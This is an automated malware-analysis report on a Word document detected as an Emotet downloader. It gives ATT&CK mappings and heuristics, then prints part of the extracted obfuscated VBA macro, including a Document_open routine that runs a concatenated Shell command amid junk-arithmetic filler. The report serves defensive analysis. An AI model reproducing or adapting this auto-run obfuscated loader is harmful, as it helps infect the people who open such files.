Verdict: MALICIOUS
Risk Score: 182
Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7070497-0', strongly suggesting the Emotet family. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes the 'Shell()' function. This indicates the macro is designed to execute external commands, likely to download and run a secondary malicious payload. The document body content is heavily obfuscated and unreadable, providing no direct clues about the lure.
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-7070497-0 | severity: critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-7070497-0
- VBA macros detected | severity: medium | 2 related findings | OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA | severity: critical | OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro | severity: high | OLE_VBA_DOCOPEN: Document_Open macro
- Embedded URL | severity: info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44361 bytes |

SHA-256 (macros.bas): 6d69647304cf9670cc00e48e13c0e3c146c4410a95ac234dee27501e6763bd9f
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "KHqSGffSfnrias"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function VusslabNcMkN()
On Error Resume Next
nYajqW = 92257 * 7084 / (jiivDb - mWmOuh) - QKics + 42055 - 30541 / iWRpF
bUsQi = 85908 * 59791 / (NPpKbO - jwmYO) - jrdilF + 49288 - 33386 / HiJzj
QwaRkh = 58571 * 9031 / (QRbEQ - VZPiS) - mVCrX + 66073 - 91405 / EiFaFh
Ejzur = 11812 * 68138 / (dHKGWG - LljzEu) - USbbTO + 86585 - 73313 / cLuCNG
WcmZow = 64364 * 34453 / (ffGaI - HzFJK) - ItDhL + 31525 - 91730 / dNWzs
MjlwW = 97312 * 94623 / (LjLzYc - bsKddX) - NzicQi + 22243 - 916 / iGCMft
End Function
Private Function JtYwXsTDopUBK()
On Error Resume Next
oiafdS = (YRmDpb / rrklj * 13972 + sSKanM + 36505 / hjwja * 90039 * ftkVRV * JTDrq * wkQaOK / 91889 * QFqGZ)
NMEdcF = (ZWCCJt / oTqGw * 58650 + zmOaEE + 10969 / rsGMa * 59360 * CvGpnd * incwOi * FvJVJ / 26984 * qDXBrC)
vzTsr = (uAJrK / DbwHq * 52700 + lzwrR + 32383 / Msinw * 52099 * YrfdV * oLvAiw * WOEQLP / 72684 * MzFBbU)
FHIBRA = (qBOpS / IqWvVW * 18840 + QVSPza + 30293 / tOrFYD * 24055 * pYwnuO * YsKHZ * ukDGlp / 72694 * lSZvBI)
End Function
Private Function lSGOUMSNPw()
On Error Resume Next
AvVAz = (lthMC / EzmbHQ * 43043 + sVjRZ + 70866 / zMzYNi * 29214 * YDKwMI * EwhFl * Liwraw / 17874 * PEaOMl)
hbiaU = (kmcnwi / qlcsKK * 29789 + InzdYm + 40206 / pbXDq * 36132 * UaUpw * szWcfd * qUEoic / 47987 * jwwzQk)
cinME = (zFBkdR / PDjlh * 67287 + UCMhkw + 17172 / JcYNNz * 84774 * uvubvz * lvBjZC * rDlGwZ / 42623 * cIUEw)
PEKXU = (qnHmXO / miPjtM * 70313 + cGASM + 79557 / lGqBO * 51566 * zWChKB * dTZKv * ttlKj / 78308 * mwJEIw)
npEpWO = (zUJQr / hkUzF * 75791 + AhmjFz + 15813 / jhzWTU * 19932 * AwRzJz * RhROh * GPHwC / 66181 * CYjZG)
YasXR = (SpUQu / pbBsI * 88458 + UXjVO + 88145 / ndYsiH * 8049 * zBnGJi * OURhI * EvDpWZ / 37958 * oFddkU)
End Function
Private Function VujLfkTdV()
On Error Resume Next
NIdjh = (BZrANG / YAGWL * 58590 + pFVKjf + 36738 / wGHvB * 48703 * SWwjTL * UcfGzv * ZKUVz / 28640 * mTzCQ)
GtBKR = 53552 * 55633 / (ijMtO - wTmPZM) - MCvbW + 97204 - 40828 / bKGzDE
CimEf = (Cojsjz / vdnUUm * 47729 + rlOGRB + 70255 / OfiLoM * 40537 * KOHQE * IsWPW * dJjsjh / 19542 * YzNqRB)
aCwNSS = (znRcj / LMrZct * 36649 + JdfjOn + 84163 / lnqbJS * 19056 * sjJTH * zsOuA * stBbV / 84741 * ZQdDf)
ktREtY = (jacLnC / tfdhXL * 42978 + mZCKrf + 7053 / hDjJji * 26524 * EXdqj * KLLXtn * UsTGo / 13865 * CjhCfd)
FnniI = (KFiIji / VkBfoJ * 10431 + lbHCbh + 23600 / RzDvv * 74605 * cnnwzd * bAfQC * LLdsM / 31988 * LjjjA)
End Function
Private Sub Document_open()
On Error Resume Next
zrknf = (91663 / BuUVvo * 39085 / whSan - 43870 - HXWtX - JFWVXR + qzrsV)
lbXhvI = (96367 / wcBWsp * 83247 / tCIwUM - 22107 - zYhFN - mjRRvc + UYETYW)
WvPvW = (41463 / kfUin * 65063 / lhKUEz - 21021 - ERCTMR - TIbqJ + jUjhY)
Shell "" + UvmRToObFZRzu + QmYwsozzX + CVar("c") + TAqZFiKMmbjbEt + RvGUdGjaGwG + hhNOGr + oFCRUw + IzdUwUj + uLaAHr + scLOWWmi + hDhdCzuDW + cXjsn + zaDMijmNE + mtkhCzEsvjw + szNiZjwpn + pmvtzRHiJU + zSpZVM + MqDdRviG + OIwwCMjJ + XRhdzt + UYmpbrzAnu + QapWniPkZY + kWbtfTpVF, 0
GKYqbY = (67696 / ZwzHr * 90605 / nPCZzz - 36638 - ahJoUG - MdcYMP + izjWX)
GOVdod = (64090 / YiWCb * 76411 / bDDmnc - 29027 - ZpYaH - aPobt + nHwDZJ)
OEYiEd = (92364 / ijdIGP * 82322 / IQhsXM - 55916 - BcasDr - OpjaR + ALGdi)
End Sub
Private Function wCfazTBmdPlO()
On Error Resume Next
iTXwX = (70083 / hNMru * 91269 / BYvhH - 52259 - VGMlC - pZNpiR + RErlwv)
zrsHNz = qZfQOa * YOJjdI * YPkacc - hnosoB
HGAKOR = FBlFHL * JwwQdL * HilZno - UUzQP
tVwOw = rfYdE * oGsDV * rDsKkY - JtWLaM
GPMwuq = (1233 / UTkDh * 17458 / LNUrh - 14228 - WIcPz - hJjMcX + qzmHC)
CRqcMa = (74984 / Cnwzph * 29716 / sArXiq - 50849 - hvYOkV - VdUbDt + HCwQAr)
End Function
Private Function JPLmQIG()
On Error R
... (truncated)